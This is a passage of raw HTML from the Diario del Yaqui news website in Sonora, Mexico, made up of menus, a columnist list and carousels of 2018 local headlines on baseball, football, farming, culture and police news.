trigo'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/qpp-6-250x140.jpg" alt="Construyen casa con paja de trigo" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 2 días</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/construyen-casa-con-paja-de-trigo/' title='Construyen casa con paja de trigo'>Construyen casa con paja de trigo</a></h4></li></ul></li><!-- #cat-latest-76200 -->
<li id='cat-latest-76201' class=' cat-latest-76201'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76201' data-child_object_id='50'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/cultura-en-cajeme-necesidades-pendientes/' title='Cultura en Cajeme&#8230; Necesidades pendientes'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/04/lñ-5-250x140.jpg" alt="Cultura en Cajeme&#8230; Necesidades pendientes" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">21 abril, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/cultura-en-cajeme-necesidades-pendientes/' title='Cultura en Cajeme&#8230; Necesidades pendientes'>Cultura en Cajeme&#8230; Necesidades pendientes</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/retrospectiva-de-cajeme-nace-el-ayuntamiento-de-cajeme/' title='Retrospectiva de Cajeme&#8230; Nace el Ayuntamiento de Cajeme'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/04/lñ-7-1-250x140.jpg" alt="Retrospectiva de Cajeme&#8230; Nace el Ayuntamiento de Cajeme" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">21 abril, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/retrospectiva-de-cajeme-nace-el-ayuntamiento-de-cajeme/' title='Retrospectiva de Cajeme&#8230; Nace el Ayuntamiento de Cajeme'>Retrospectiva de Cajeme&#8230; Nace el Ayuntamiento de Cajeme</a></h4></li><li class='no-thumb clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/dolor-de-larva/' title='Dolor de larva'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Dolor de larva" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">21 abril, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/dolor-de-larva/' title='Dolor de larva'>Dolor de larva</a></h4></li><li class='no-thumb clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/promesa/' title='Promesa'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Promesa" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">21 abril, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/promesa/' title='Promesa'>Promesa</a></h4></li></ul></li><!-- #cat-latest-76201 -->
<li id='cat-latest-76202' class=' cat-latest-76202'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76202' data-child_object_id='45'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/buscan-los-liberen-de-pagar-predial/' title='Buscan los liberen de pagar predial'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-6-250x140.jpg" alt="Buscan los liberen de pagar predial" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/buscan-los-liberen-de-pagar-predial/' title='Buscan los liberen de pagar predial'>Buscan los liberen de pagar predial</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/gestionan-maquinaria-para-mejorar-parcelas/' title='Gestionan maquinaria para mejorar parcelas'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-5-250x140.jpg" alt="Gestionan maquinaria para mejorar parcelas" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/gestionan-maquinaria-para-mejorar-parcelas/' title='Gestionan maquinaria para mejorar parcelas'>Gestionan maquinaria para mejorar parcelas</a></h4></li><li class='no-thumb clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/hay-poco-interes-por-la-lectura/' title='Hay poco interés por la lectura'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Hay poco interés por la lectura" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/hay-poco-interes-por-la-lectura/' title='Hay poco interés por la lectura'>Hay poco interés por la lectura</a></h4></li><li class='no-thumb clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/en-junio-levantaran-cosecha-de-cartamo/' title='En junio levantarán   cosecha de cártamo'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="En junio levantarán   cosecha de cártamo" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/en-junio-levantaran-cosecha-de-cartamo/' title='En junio levantarán   cosecha de cártamo'>En junio levantarán   cosecha de cártamo</a></h4></li></ul></li><!-- #cat-latest-76202 -->
</ul><!-- .subcat -->
</div><!-- .sub-mega-wrap -->
</li>
<li id="menu-item-76212" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-parent-item has-one-col-dropdown" itemprop="name"><a href="#" itemprop="name"><span class="menu-title-outer"><span class="menu-title">Columnistas</span></span></a>


<ul class="sub-menu">
	<li id="menu-item-90706" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/historias-del-mayofelipe-gutierrez-millan/" itemprop="name"><span class="menu-title">Historias Del Mayo/Felipe Gutiérrez Millán</span></a></li>
	<li id="menu-item-90258" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/de-todo-anselmo-sierra-felix/" itemprop="name"><span class="menu-title">De Todo/Anselmo Sierra Félix</span></a></li>
	<li id="menu-item-90259" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/actitudesrafael-robles-flores/" itemprop="name"><span class="menu-title">Actitudes/Rafael Robles Flores</span></a></li>
	<li id="menu-item-76205" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/editorialdiario-del-yaqui/" itemprop="name"><span class="menu-title">Editorial/Diario del Yaqui</span></a></li>
	<li id="menu-item-76204" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/a-galopardavid-vazquez/" itemprop="name"><span class="menu-title">A Galopar/David Vázquez</span></a></li>
	<li id="menu-item-76206" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/en-la-encrucijadabernardino-galaviz/" itemprop="name"><span class="menu-title">En la Encrucijada/Bernardino Galaviz</span></a></li>
	<li id="menu-item-76207" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/obr-deportesjoel-luna/" itemprop="name"><span class="menu-title">OBR Deportes/Joel Luna</span></a></li>
	<li id="menu-item-76208" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/opinionroberto-dike-rivera/" itemprop="name"><span class="menu-title">Opinión/Roberto Dike Rivera</span></a></li>
	<li id="menu-item-76209" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/pasion-por-los-negociosdemian-duarte/" itemprop="name"><span class="menu-title">Pasión por los negocios/Demian Duarte</span></a></li>
	<li id="menu-item-76210" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/tarjeta-postaljesus-c-ruiz/" itemprop="name"><span class="menu-title">Tarjeta Postal/Jesús C. Ruiz</span></a></li>
	<li id="menu-item-76211" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/columnistas/voces-del-campofederico-chavez/" itemprop="name"><span class="menu-title">Voces del campo/Federico Chávez</span></a></li>
</ul>
</li>
<li id="menu-item-76213" class="menu-item menu-item-type-custom menu-item-object-custom has-one-col-dropdown" itemprop="name"><a href="http://www.diariodelyaqui.mx/privacidad.pdf" itemprop="name"><span class="menu-title-outer"><span class="menu-title">Aviso de Privacidad</span></span></a></li>
<li id="menu-item-76188" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-last has-one-col-dropdown" itemprop="name"><a href="http://diariodelyaqui.mx/impreso" itemprop="name"><span class="menu-title-outer"><span class="menu-title">Edicion Impresa</span></span></a></li>
</ul>			</div>
 		</nav>
		<!-- /End Main Menu -->

<div class="breaking-banner" data-interval="5000"><div class="story">	            <div class="meta-bar-title"><h3><a href="#">Reciente</a></h3></div><!-- .meta-bar-title -->
	            <div class="meta-bar">
	            	<ul>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/">
	                       	    	<span class="story-title">Medias Blancas cae ante Indios</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/">
	                       	    	<span class="story-title">Tras analizar el video del pasado domingo de Carril San Isidro&#8230;</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/">
	                       	    	<span class="story-title">Lamentan salida de Valdeomillos de la Selección Nacional</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/">
	                       	    	<span class="story-title">Habrá Jornada 17 de Futbol Veterano Municipal</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/jornada-de-futbol-rapido/">
	                       	    	<span class="story-title">Jornada de futbol rápido</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/halcones-recibe-a-ostioneros/">
	                       	    	<span class="story-title">Halcones recibe a Ostioneros</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/troylos-lidera-la-liga-jose-julian-quiroz/">
	                       	    	<span class="story-title">Troylos lidera la Liga  José Julián Quiroz</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/mantiene-delegacion-el-invicto/">
	                       	    	<span class="story-title">Mantiene Delegación el invicto</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/se-queda-rodolfo-solis-con-dos-gemas-de-la-triple-corona-de-bateo/">
	                       	    	<span class="story-title">Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                    <li>
							<h3 class="story-h">
								<a href="http://diariodelyaqui.mx/camionazo-en-navojoa/">
	                       	    	<span class="story-title">Camionazo en Navojoa</span>
	                            	
	                            </a>
	                        </h3>
	                    </li>
	                	                </ul>
	            </div>
	    			    	</div><!-- .story -->
	    </div><!-- .breaking-banner -->
	    		<div class="btn-group top-news">
		    <div class="ribbon-shadow-left bg-ribbon-shadow-left"></div>
		    <a class="dropdown-toggle" data-toggle="dropdown" href="javascript:void(0)">
		        <span class="number">20</span>
		        <span>Últimas Noticias:</span>
		    </a>
		</div>

		<div class="submenu top-news-items">

	 		<div class="sub-mega-wrap radium-mega-div cat-menu"><div class="subfeatured-articles"><div class="horizontal-carousel-container"><div class="control bg-arrow-carousel-big-prev prev"></div><div class="horizontal-carousel post"><ul class="sub-posts sub-menu"><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/' title='Medias Blancas cae ante Indios'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-8-230x140.jpg" alt="Medias Blancas cae ante Indios" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/' title='Medias Blancas cae ante Indios'>Medias Blancas cae ante Indios</a></h5></li><li class="cat-post no-thumb clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/' title='Tras analizar el video del pasado domingo de Carril San Isidro&#8230;'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Tras analizar el video del pasado domingo de Carril San Isidro&#8230;" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/columnistas/a-galopardavid-vazquez/">A Galopar/David Vázquez</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/' title='Tras analizar el video del pasado domingo de Carril San Isidro&#8230;'>Tras analizar el video del pasado domingo de Carril San Isidro&#8230;</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/' title='Lamentan salida de Valdeomillos de la Selección Nacional'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-12-230x140.jpg" alt="Lamentan salida de Valdeomillos de la Selección Nacional" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/' title='Lamentan salida de Valdeomillos de la Selección Nacional'>Lamentan salida de Valdeomillos de la Selección Nacional</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/' title='Habrá Jornada 17 de Futbol Veterano Municipal'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-9-230x140.jpg" alt="Habrá Jornada 17 de Futbol Veterano Municipal" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/' title='Habrá Jornada 17 de Futbol Veterano Municipal'>Habrá Jornada 17 de Futbol Veterano Municipal</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/jornada-de-futbol-rapido/' title='Jornada de futbol rápido'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-11-230x140.jpg" alt="Jornada de futbol rápido" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/jornada-de-futbol-rapido/' title='Jornada de futbol rápido'>Jornada de futbol rápido</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/halcones-recibe-a-ostioneros/' title='Halcones recibe a Ostioneros'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-10-230x140.jpg" alt="Halcones recibe a Ostioneros" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/halcones-recibe-a-ostioneros/' title='Halcones recibe a Ostioneros'>Halcones recibe a Ostioneros</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/troylos-lidera-la-liga-jose-julian-quiroz/' title='Troylos lidera la Liga  José Julián Quiroz'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-5-230x140.jpg" alt="Troylos lidera la Liga  José Julián Quiroz" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/troylos-lidera-la-liga-jose-julian-quiroz/' title='Troylos lidera la Liga  José Julián Quiroz'>Troylos lidera la Liga  José Julián Quiroz</a></h5></li><li class="cat-post no-thumb clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/mantiene-delegacion-el-invicto/' title='Mantiene Delegación el invicto'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Mantiene Delegación el invicto" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/mantiene-delegacion-el-invicto/' title='Mantiene Delegación el invicto'>Mantiene Delegación el invicto</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/se-queda-rodolfo-solis-con-dos-gemas-de-la-triple-corona-de-bateo/' title='Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-7-230x140.jpg" alt="Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/se-queda-rodolfo-solis-con-dos-gemas-de-la-triple-corona-de-bateo/' title='Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo'>Se queda Rodolfo Solís con dos  gemas de la triple corona de bateo</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/camionazo-en-navojoa/' title='Camionazo en Navojoa'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-10-230x140.jpg" alt="Camionazo en Navojoa" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/camionazo-en-navojoa/' title='Camionazo en Navojoa'>Camionazo en Navojoa</a></h5></li><li class="cat-post has-thumbnail clearfix"><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/detenidos-con-armas-cortas/' title='Detenidos con armas cortas'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-12-230x140.jpg" alt="Detenidos con armas cortas" height="140" width="230"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/">Policiaca</a></div><div class="entry-featured">Destacado</div></div></div><h5 class='subcat-title'><a href='http://diariodelyaqui.mx/detenidos-con-armas-cortas/' title='Detenidos con armas cortas'>Detenidos con armas cortas</a></h5></li></ul></div><div class="control bg-arrow-carousel-big-next next"></div></div></div></div><!-- .sub-mega-wrap -->

			</div>

		
                </div><!-- END .large-12 .columns -->

            </div><!-- END .row -->

        </div><!-- END .site-navigation -->

    </header><!-- END #header -->
		<div id="main-container">

    <div class="recent-posts-carousel-container">

		<div class="teaser-container recent-posts-carousel clearfix">

            <div class="horizontal-carousel-container">

                <div class="control prev"></div>

                <div class="horizontal-carousel post">

        			<ul class="clearfix">

        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Medias Blancas cae ante Indios" href="http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-8-80x80.jpg" alt="Medias Blancas cae ante Indios" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/">Medias Blancas cae ante Indios</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="no-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Tras analizar el video del pasado domingo de Carril San Isidro&#8230;" href="http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Tras analizar el video del pasado domingo de Carril San Isidro&#8230;" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/columnistas/a-galopardavid-vazquez/">A Galopar/David Vázquez</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/tras-analizar-el-video-del-pasado-domingo-de-carril-san-isidro/">Tras analizar el video del pasado domingo&hellip;</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Lamentan salida de Valdeomillos de la Selección Nacional" href="http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-12-80x80.jpg" alt="Lamentan salida de Valdeomillos de la Selección Nacional" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/">Lamentan salida de Valdeomillos de la Selección&hellip;</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Habrá Jornada 17 de Futbol Veterano Municipal" href="http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-9-80x80.jpg" alt="Habrá Jornada 17 de Futbol Veterano Municipal" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/">Habrá Jornada 17 de Futbol Veterano Municipal</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Jornada de futbol rápido" href="http://diariodelyaqui.mx/jornada-de-futbol-rapido/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-11-80x80.jpg" alt="Jornada de futbol rápido" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/jornada-de-futbol-rapido/">Jornada de futbol rápido</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Halcones recibe a Ostioneros" href="http://diariodelyaqui.mx/halcones-recibe-a-ostioneros/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-10-80x80.jpg" alt="Halcones recibe a Ostioneros" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
    </div>

                						<h6 class="entry-title"><a href="http://diariodelyaqui.mx/halcones-recibe-a-ostioneros/">Halcones recibe a Ostioneros</a></h6>
                						                 					</div><!-- .entry-summary -->

                                </div><!-- .inner-->

                            </article>

        				</li><!--column-->

        	  			
        			
        				<li class="has-thumb ">

                            <article class="teaser teaser-mini">

                                <div class="inner">

                					<div class="grid-thumb">
                					    
                					                    					
                						<a title="Vínculo Permanente a Troylos lidera la Liga  José Julián Quiroz" href="http://diariodelyaqui.mx/troylos-lidera-la-liga-jose-julian-quiroz/" data-width="80" data-height="80">
                							<img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-5-80x80.jpg" alt="Troylos lidera la Liga  José Julián Quiroz" width="80" height="80"/>
                						</a>
                						
                						                						
                					</div><!-- .grid-thumb -->

                					<div class="entry-summary">
                					    
    <div class="entry-extras">

        <div class="entry-category none"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/">Pasión</a></div><div class="entry-featured">Destacado</div>
